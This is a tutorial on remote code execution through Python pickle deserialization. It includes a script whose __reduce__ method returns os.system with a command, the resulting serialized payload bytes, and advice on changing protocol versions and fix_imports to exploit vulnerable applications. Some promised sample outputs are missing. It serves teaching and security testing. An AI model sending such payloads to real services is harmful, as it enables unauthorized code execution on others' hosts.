Python Pickles

In Python, an object can be converted into a stream of bytes so that it can be moved between environments or processes. Converting the object to bytes is known as serialization, and rebuilding the object from those bytes is known as deserialization. The Pickle library can be used in Python for this purpose; however, it is insecure, and deserializing attacker-controlled data can allow an attacker to obtain remote code execution (RCE) on the target host.

The documentation includes a warning about this situation, stating that serialized data should only be processed when it comes from a trusted source:

Warning: The pickle module is not secure. Only unpickle data you trust. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling.
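To make the warning concrete, here is a minimal sketch that uses a deliberately harmless callable. The class name Demo is an assumption made for illustration, and os.getcwd stands in for whatever function an attacker would choose to call.

```python
import os
import pickle


class Demo:
    """Illustrative class; not part of any real application."""

    def __reduce__(self):
        # pickle records "call os.getcwd with no arguments" instead of
        # the object's state. The call itself happens inside pickle.loads.
        return (os.getcwd, ())


data = pickle.dumps(Demo())

# No Demo instance is rebuilt: loads returns whatever the callable returned.
result = pickle.loads(data)
print(type(result), result)
```

The point of the sketch is that the receiving side never has to know about Demo at all. The serialized data names the callable and its arguments, and loads calls it.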

There is a difference between how an object is serialized in Python 2 and Python 3, which can be an issue when dealing with applications that still run the deprecated Python 2. However, the Pickle library in Python 3 can generate a Python 2 compatible serialized object, which can be used to build the payload for these scenarios.

The following Python 3 script creates a serialized object:

#!/usr/bin/env python3

import os
import pickle

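class RCE(object):
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        # pickle stores this (callable, args) pair; on load it calls os.system(cmd)
        return (os.system, (self.cmd,))

# Serialize with the default protocol and print the resulting bytes
print(pickle.dumps(RCE(b"uname -a")))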

The output of the script above is shown below:

\x80\x04\x95#\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94C\x08uname -a\x94\x85\x94R\x94.
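The structure of this output can be inspected without deserializing it. The sketch below feeds the bytes shown above to the standard pickletools module; the variable names are chosen for illustration only.

```python
import io
import pickletools

# Bytes copied from the output shown above (protocol 4, generated on a POSIX host).
payload = (
    b"\x80\x04\x95#\x00\x00\x00\x00\x00\x00\x00"
    b"\x8c\x05posix\x94\x8c\x06system\x94\x93\x94"
    b"C\x08uname -a\x94\x85\x94R\x94."
)

# pickletools.dis only decodes the opcodes; it does not import or call anything.
listing = io.StringIO()
pickletools.dis(payload, out=listing)
print(listing.getvalue())
```

In the listing, STACK_GLOBAL is the opcode that looks up posix.system, and REDUCE is the opcode that calls it with the argument tuple holding the command.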

The latest version of the protocol is 5; however, in Python 3.8 the default protocol version is 4. The default can be checked with pickle.DEFAULT_PROTOCOL and the highest protocol version available can be checked with pickle.HIGHEST_PROTOCOL. The output shown above is for protocol version 4; with version 5 it would be the same apart from the protocol number in the second byte (\x05 instead of \x04).
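A quick way to check these values on a given interpreter is sketched below. The string "example" is only a placeholder object.

```python
import pickle

print("default:", pickle.DEFAULT_PROTOCOL)
print("highest:", pickle.HIGHEST_PROTOCOL)

# From protocol 2 onwards the stream starts with the PROTO opcode (0x80)
# followed by one byte holding the protocol number.
header = pickle.dumps("example", protocol=pickle.HIGHEST_PROTOCOL)[:2]
print(header)
```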

Below is the output of each protocol version for the same object mentioned in the script above
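The per-protocol output for that object can be regenerated with a short loop. This is a sketch that reuses the RCE class from the script above; the exact bytes depend on the platform and Python version, so no expected output is given.

```python
import os
import pickle


class RCE(object):
    def __init__(self, cmd):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


# dumps only records a reference to os.system; nothing is executed here.
payloads = {
    proto: pickle.dumps(RCE(b"uname -a"), protocol=proto)
    for proto in range(pickle.HIGHEST_PROTOCOL + 1)
}

for proto, data in payloads.items():
    print(proto, data)
```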

Protocol versions 0 through 2 can be deserialized by Python 2, while versions 3 through 5 can only be deserialized by Python 3. This matters because, if the target application runs an older version of Python, the script has to be adjusted to generate a payload in a protocol that version understands.

The protocol version can be specified by passing the number as the second positional argument to the dumps function or by using the protocol= argument, as shown below:

pickle.dumps(RCE(b"uname -a"), 1)
pickle.dumps(RCE(b"uname -a"), protocol=1)

The other argument that changes the serialized object is fix_imports=. When the protocol version is lower than 3, it translates the module names in the serialized object so that they match the module names on Python 2. However, the translated name may not match the module that exists on the target system, in which case the argument must be set to False. In the sample output above this was not needed, as the same module name was used; in the sample below, however, the output does vary because the module is named differently

The only difference is that the module name subprocess is changed to commands. If the protocol version is set to 3 or higher, the fix_imports= argument has no effect on the output.
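The renaming can be reproduced with a small sketch. The class name Demo and the choice of subprocess.getoutput are assumptions made for illustration; any function from the subprocess module would be pickled under the same module name.

```python
import pickle
import subprocess


class Demo(object):
    """Illustrative class; the command is never executed by dumps."""

    def __reduce__(self):
        return (subprocess.getoutput, ("uname -a",))


# Protocol 2 with the default fix_imports=True: subprocess becomes commands.
translated = pickle.dumps(Demo(), protocol=2, fix_imports=True)
# Same protocol with the translation disabled: the Python 3 name is kept.
untouched = pickle.dumps(Demo(), protocol=2, fix_imports=False)

print(translated)
print(untouched)

# For protocol 3 and later the argument makes no difference.
same = (
    pickle.dumps(Demo(), protocol=3, fix_imports=True)
    == pickle.dumps(Demo(), protocol=3, fix_imports=False)
)
print(same)
```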

The loads function determines the protocol version from the data itself before deserializing it. This means that when attempting to exploit a vulnerable application, if the payload fails, start lowering the protocol version and include the fix_imports argument as part of the testing as well.
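The protocol detection can be observed with an ordinary object. In this sketch the dictionary is a placeholder value; loads is called the same way for every protocol and is never told which one was used.

```python
import pickle

value = {"user": "alice", "roles": ["admin", "dev"]}

# Serialize with every available protocol and load each result back.
# loads takes no protocol argument; it reads the format from the data.
results = [
    pickle.loads(pickle.dumps(value, protocol=proto)) == value
    for proto in range(pickle.HIGHEST_PROTOCOL + 1)
]

print(results)
```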